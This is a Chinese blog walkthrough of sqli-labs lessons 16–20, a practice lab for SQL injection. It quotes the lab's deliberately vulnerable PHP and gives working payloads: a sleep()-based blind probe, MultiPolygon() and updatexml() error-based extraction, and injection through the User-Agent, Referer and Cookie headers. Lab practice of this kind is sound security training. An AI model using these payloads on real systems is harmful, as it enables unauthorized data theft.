sqli-labs通关16-20

已于 2023-03-25 14:39:48 修改
阅读量80 收藏
点赞数
分类专栏: 靶机及靶场通关 文章标签: mysql 数据库 php
于 2023-02-21 20:25:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/128746099
版权

目录

1.lesson-16 布尔或时间盲注

2.lesson-17  MultiPolygon()报错注入

3.lesson-18 ua头注入

4.lesson-19 referer头注入

 5.lesson-20 cookie注入

1.lesson-16 布尔或时间盲注

为双引号加括号的字符型注入

判断注入类型:

uname=ain") and sleep(3)%23&passwd=fin&submit=Submit

其他参考lesson-2

2.lesson-17  MultiPolygon()报错注入

lesson-17源代码

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
	{
	if(!empty($value))             #判断是否为空
		{
		// truncation (see comments)
		$value = substr($value,0,15);
		}

		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())   #当魔术引号开启时,为true,会将' "等符号转义
			{  
			$value = stripslashes($value);    #去除' "等符号的转义符
			}

		// Quote if not a number
		if (!ctype_digit($value))
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}   #会将' "等符号转义
		
	else
		{
		$value = intval($value);
		}
	return $value;
	}

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))

{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);  

$passwd=$_POST['passwd'];

@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
	if($row)
	{
  		//echo '<font color= "#0000ff">';	
		$row1 = $row['username'];  	
		//echo 'Your Login name:'. $row1;
		$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
		mysql_query($update);
  		echo "<br>";
	


?>

uname用mysql_real_escape_string做了过滤,通过uname查询的语句是没有注入的,uname一定要存在,才能执行下面的update更新语句,所以为password位置的单引号字符型注入,为update语句注入

判断注入:

uname=admin&passwd=a'&submit=Submit

 查数据库名:

uname=admin&passwd=a' and MultiPolygon((select * from(select * from(select database())a)b))-- +&submit=Submit

查表名:

uname=admin&passwd=a' and MultiPolygon((select * from(select * from(select group_concat(table_name) from information_schema.tables where table_schema='security')a)b))-- +&submit=Submit

 

报错注入需要注意函数使用的版本,mysql 5.5.29所有报错注入函数可用

 十大报错注入参考文章:

(21条消息) MySQL十大报错函数_dingpiqu2796的博客-CSDN博客https://blog.csdn.net/dingpiqu2796/article/details/101191078

3.lesson-18 ua头注入

需要登录成功才能注入

登录成功后就能发现注入在user-agent,是insert语句注入

 burp 抓包发送到repeater查找注入类型,ua头单引号

 查用户:

ua头填入内容:

1' and  updatexml(1,concat(0x7e,(select user()),0x7e),1) and '

4.lesson-19 referer头注入

登录成功后,发现是referer头注入

 burp抓包,查用户

referer处写入:

1' and  updatexml(1,concat(0x7e,(select user()),0x7e),1) and '

 5.lesson-20 cookie注入

为delete注入

登录成功后发现是cookie有注入

  cookie填入:

查用户

uname=admin' and  updatexml(1,concat(0x7e,(select user()),0x7e),1)-- +

mushangqiujin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs第十六关
yuqnqi的博客
05-09 208
输入admin") and if(length(database()=8),sleep(5),1) #延时五秒,说明猜对了,数据库位数为8。页面无报错无回显,需要查看源码。字母s的ASCII码是115。由源码知,双引号反括号闭合。一个字母一个字母的尝试吧。继续时间盲注猜数据库名。本关为双引号反括号闭合。像这样继续猜解不断尝试。延时5秒说明猜对了.
表单注入——sqli-labs第11~16关
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
07-28 1751
1、观察是post还是get 可以看url的变化,或者看源码 xxxx’ order by 10# ’ order by 2#
2020.4.4 sqli-labs--第十五、十六关 ②
DSR446的博客
04-04 421
less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注) 方法一 盲注 - 基于布尔值 - 字符串 怎么输入都没有回显,那就时间延迟吧。 布尔测试payload uname=admin' and 1=1 --+&passwd=admin&submit=Submit //登...
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 13万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs通关教程
m0_65150886的博客
01-23 1226
id=1返回正常页面?id=1'显示sql语句有误?id=1''页面返回正常,证明是字符型注入。因为该页面存在回显,所以我们可以使用联合查询。
sqli-labs通关详解
m0_52051132的博客
10-15 6752
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单。sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security --tables 最后脱库。条件正确有回显,条件错误没有回显,布尔盲注?py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库。
Sqli-Labs 通关笔记
m0_43397796的博客
08-07 2367
Sqli-Labs靶场
sqli-labs通关汇总-page1
m0_37638874的博客
05-31 1054
前言: 刚辞去变压器方面的工作,准备回归老本行,干渗透测试了。 本文章意在学习SQL注入并结合源代码学习PHP。 借助的是sqli-labs靶场,此靶场是搭在本地的,原因不想在虚拟机里下常用的软件了,如何搭建大家自己搜吧,这里不赘述了。 我们已关卡的方式,边过关边学习 我个人认为这篇文章适合初学走细节的人看 less-1 我们直接贴一下第一关的php源码 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 2530
sqli-labs靶场之前建议补一下基础。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
mysql支持的存储引擎有哪些
JustinMars的博客
05-28 177
选择存储引擎时应根据具体应用场景和需求来决定。例如: - 如果需要事务和高数据完整性,选择InnoDB。 - 如果读操作频繁且不需要事务,选择MyISAM。 - 如果需要快速的临时数据存储,选择MEMORY。 - 如果需要数据压缩和存档,选择ARCHIVE。
chat4-Server端保存聊天消息到mysql
最新发布
gulanga5的博客
06-02 470
本文档描述了Server端接收到Client的消息并转发给所有客户端或私发给某个客户端同时将聊天消息保存到mysql服务端为当前客户端创建一个线程,此线程接收当前客户端的消息并转发给所有客户端或私发给某个客户端同时将聊天消息保存到mysql本文档主要总结了将聊天消息保存到mysql!!!),;import;import;import;/**用druid连接池来连接数据库的工具类*/DBUtil。
【开源】渔具租赁系统 JAVA+Vue.js+SpringBoot+MySQL
as230627的博客
05-30 1050
Vue.js+SpringBoot前后端分离新手入门项目《渔具租赁系统》,包括渔具档案模块、渔具租赁模块、渔具归还模块、在线留言模块和部门角色菜单模块,项目编号T005。
【MySQL】索引
cefler的博客
05-31 784
【MySQL】索引
ELT 同步 MySQL 到 Doris
eagle89的专栏
05-29 931
同步 MySQL 到 Doris
sqli-labs通关28
03-05
通关28其中的一个关卡,下面是关于sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值